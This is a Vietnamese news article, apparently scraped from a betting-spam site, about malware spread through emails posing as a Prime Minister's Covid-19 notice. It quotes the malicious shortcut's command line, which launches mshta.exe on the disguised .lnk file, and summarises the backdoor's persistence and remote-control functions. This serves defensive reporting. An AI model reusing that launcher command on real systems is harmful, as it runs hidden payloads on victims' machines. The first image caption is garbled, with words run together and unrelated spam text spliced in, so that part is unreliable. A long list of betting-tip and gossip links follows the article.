Cảnh giác với mã độc được phát tán qua email mạo danh thông báo của Thủ tướng về dịch Covid
![]() |
TheảnhgiácvớimãđộcđượcpháttánquaemailmạodanhthôngbáocủaThủtướngvềdịlich thi đấu ngoại anho chuyên gia, thời gian gần đây do diễn biến của dịch Covid-19 khá phức tạp, nhiều nhóm hacker lợi dụng việc này để thực hiện các chiến dịch tấn công có chủ đích APT nhằm vào các tổ chức trên thế giới, cũng như xuất hiện chiến dịch ở Việt Nam (Ảnh minh họa: Internet) |
Trong báo cáo phân tích của CMC Cyber Security về mẫu mã độc được phát tán qua email giả dạng thông báo của Thủ tướng về dịch Covid-19, doanh nghiệp bảo mật này cho hay, thời gian gần đây do diễn biến của dịch Covid-19 khá phức tạp, nhiều nhóm hacker lợi dụng việc này để thực hiện các chiến dịch APT (tấn công có chủ đích - PV) nhằm vào các tổ chức trên thế giới, cũng như xuất hiện chiến dịch ở Việt Nam.
Mới đây, lợi dụng tình hình căng thẳng của dịch viêm đường hô hấp cấp Covid-19, mẫu mã độc giống với một số mẫu do nhóm tin tặc Panda phát triển được phát hiện đã thực hiện mạo danh văn bản thông báo của Chính phủ về tình hình dịch để đánh lừa người dùng.
![]() |
Cụ thể, mẫu mã độc được chèn trong một file word với tiêu đề “Chi Thi cua Thu tuong nguyen xuan phuc” nhằm đánh lừa người dùng. Theo phân tích của chuyên gia, file mẫu là một file shortcut có phần mở rộng là “.lnk” được ẩn dưới dạng một file winword nhằm đánh lừa người dùng do đuôi “.lnk” sẽ được Windows ẩn đi.
Tuy nhiên, file winword này sử dụng một target đáng ngờ. Thông thường target của shorcut thường trỏ đến một thư mục hoặc file đích, nhưng target của mẫu này lại chứa đoạn command có dạng: “%comspec% /c for %x in (%temp%=%cd%) do for /f “delims==” %i in (‘dir “%x\Chi Thi cua thu tuong nguyen xuan phuc.lnk” /s /b’) do start m%windir:~-1,1%hta.exe “%i”.
Cũng qua phân tích file mã độc được phát tán qua email giả dạng thông báo của Thủ tướng về dịch Covid-19, các chuyên gia CMC Cyber Security cho biết, sau khi lừa người dùng tải về, qua hàng loạt lệnh, mã độc sẽ tiến hành: tạo bản sao của 3 file thực thi vào thư mục profile của user hoặc alluserprofile nếu có đủ quyền administrator; thêm và khóa autorun để tự kích hoạt file thực thi vừa drop ra khi khởi động lại máy; tạo mutex, kết nối đến server (máy chủ) để nhận lệnh từ server; tạo backdoor (cửa hậu) cho phép kẻ tấn công thực thi lệnh từ xa; hay hỗ trợ nhiều lệnh thực thi khác nhau bao gồm upload file, thư mục, list folder, đọc file, lấy thông tin máy tính, thông tin người dùng…
-
Nhận định, soi kèo Aston Villa vs Liverpool, 2h30 ngày 20/2: Tiếp đà bất bạiKhúc hát se duyên tập 9: Bị từ chối tình cảm sau khi tham gia hàng loạt show hẹn hòNghệ sĩ Đỗ Hiếu qua đời ở tuổi 48 sau cơn đột quỵNhóm Mây Trắng trở lại showbiz sau thời gian vắng bóngSiêu máy tính dự đoán Anderlecht vs Fenerbahce, 3h00 ngày 21/2Nhận định, soi kèo Al Ain vs Sharjah, 22h45 ngày 5/1: Kẻ tám lạngSoi kèo góc Liverpool vs MU, 23h30 ngày 5/1Đi tìm 'Người chồng trong mơ' trên sóng truyền hìnhNhận định, soi kèo Ohod Medina vs Al Tai, 20h15 ngày 19/2: Khó tin cửa trênDương Hoàng Yến đóng cặp với Đạt G kể chuyện tình quân ngũ
下一篇:Nhận định, soi kèo Sanfrecce Hiroshima vs Nam Định, 17h00 ngày 19/2: Vùi dập giấc mơ
- ·Siêu máy tính dự đoán Anderlecht vs Fenerbahce, 3h00 ngày 21/2
- ·Siêu máy tính dự đoán Thái Lan vs Việt Nam, 20h00 ngày 5/1
- ·Tiết lộ bất ngờ về chồng của MC Hoàng Linh
- ·Lan Ngọc tiết lộ từng bị Ngô Thanh Vân tát 10 lần xệ 1 bên mặt
- ·Nhận định, soi kèo Racing d'Abidjan vs ISCA, 22h30 ngày 20/2: Khó cho cửa trên
- ·Ninh Hải Bolero ra mắt MV 'Câu chuyện đầu năm'
- ·Nhận định, soi kèo Khor Fakkan vs Baniyas, 19h55 ngày 6/1: Khó tin cửa dưới
- ·Tài tử Doctor Who lao đao sau bê bối quấy rối tình dục 27 phụ nữ
- ·Nhận định, soi kèo Stade Tunisien vs Etoile du Sahel, 20h00 ngày 19/2: Khách ‘ghi điểm’
- ·'Tay trắng' rời ‘Lựa chọn của trái tim’ vì thói trăng hoa
- ·Khúc hát se duyên tập 9: Bị từ chối tình cảm sau khi tham gia hàng loạt show hẹn hò
- ·Nhận định, soi kèo Casa Pia vs Famalicao, 01h00 ngày 6/1: Nối dài mạch thắng
- ·Nhận định, soi kèo Galatasaray vs AZ Alkmaar, 00h45 ngày 21/2: Khách đi tiếp
- ·Nhận định, soi kèo Fenerbahce vs Hatayspor, 23h00 ngày 5/1: Chênh lệch dẳng cấp
- ·Ca sĩ bí ẩn tập 11 Phạm Lịch đọ giọng hát với hoa hậu, thừa nhận vẫn cô đơn
- ·Ca sĩ tranh tài tập 10: Người quen Trịnh Thăng Bình bị ‘hành hạ’ trên sân khấu vì hát dở
- ·Nhận định, soi kèo U20 Nhật Bản vs U20 Hàn Quốc, 14h00 ngày 20/2: Khẳng định đẳng cấp
- ·Phim thảm hoạ 18+ '365 Days' bị gọi tên ở Mâm xôi vàng
- ·Nhận định, soi kèo Roma vs Lazio, 2h45 ngày 6/1: Derby căng thẳng
- ·Nhận định, soi kèo St Johnstone vs Dundee FC, 22h00 ngày 5/1: Chìm trong khủng hoảng
- ·Nhận định, soi kèo Arnett Gardens vs Portmore United, 07h00 ngày 21/2: Giữ vững ngôi nhì
- ·Việt Hương thổ lộ say đắm Akira Phan vì nhảy đẹp và sexy
- ·Sơn Tùng tung ca khúc mới giữa ồn ào chia tay Thiều Bảo Trâm
- ·Nhận định, soi kèo Shillong Lajong Reserve vs Nongrim Hills, 15h30 ngày 6/1: Không hề ngon ăn
- ·Nhận định, soi kèo Naft Misan vs Al Karma SC, 18h30 ngày 20/2: Bất phân thắng bại
- ·Nhận định, soi kèo Shillong Lajong Reserve vs Nongrim Hills, 15h30 ngày 6/1: Không hề ngon ăn
- ·Nhận định, soi kèo Atlas vs Club Necaxa, 10h10 ngày 19/2: Khó cho chủ nhà
- ·Đêm nhạc tưởng nhớ Vân Quang Long quyên được 236 triệu đồng
- ·Văn Mai Hương: Trong gần 3 năm, tôi yêu 3
- ·Sao Mai Huyền Trang ra MV mới: 'Anh có về Quảng Bình cùng em'
- ·Nhận định, soi kèo Ohod Medina vs Al Tai, 20h15 ngày 19/2: Khó tin cửa trên
- ·Bảo Kun bật khóc khi nhìn lại mình trong 'Sao nhập ngũ' mùa 5
- ·Sao Mai Huyền Trang ra MV mới: 'Anh có về Quảng Bình cùng em'
- ·Nhận định, soi kèo Al Nasr vs Al Arabi, 21h35 ngày 6/1: Khó tin chủ nhà
- ·Nhận định, soi kèo Persis Solo vs Semen Padang, 15h30 ngày 21/2: Tiếp tục bét bảng
- ·Á quân giọng hát hay Hà Nội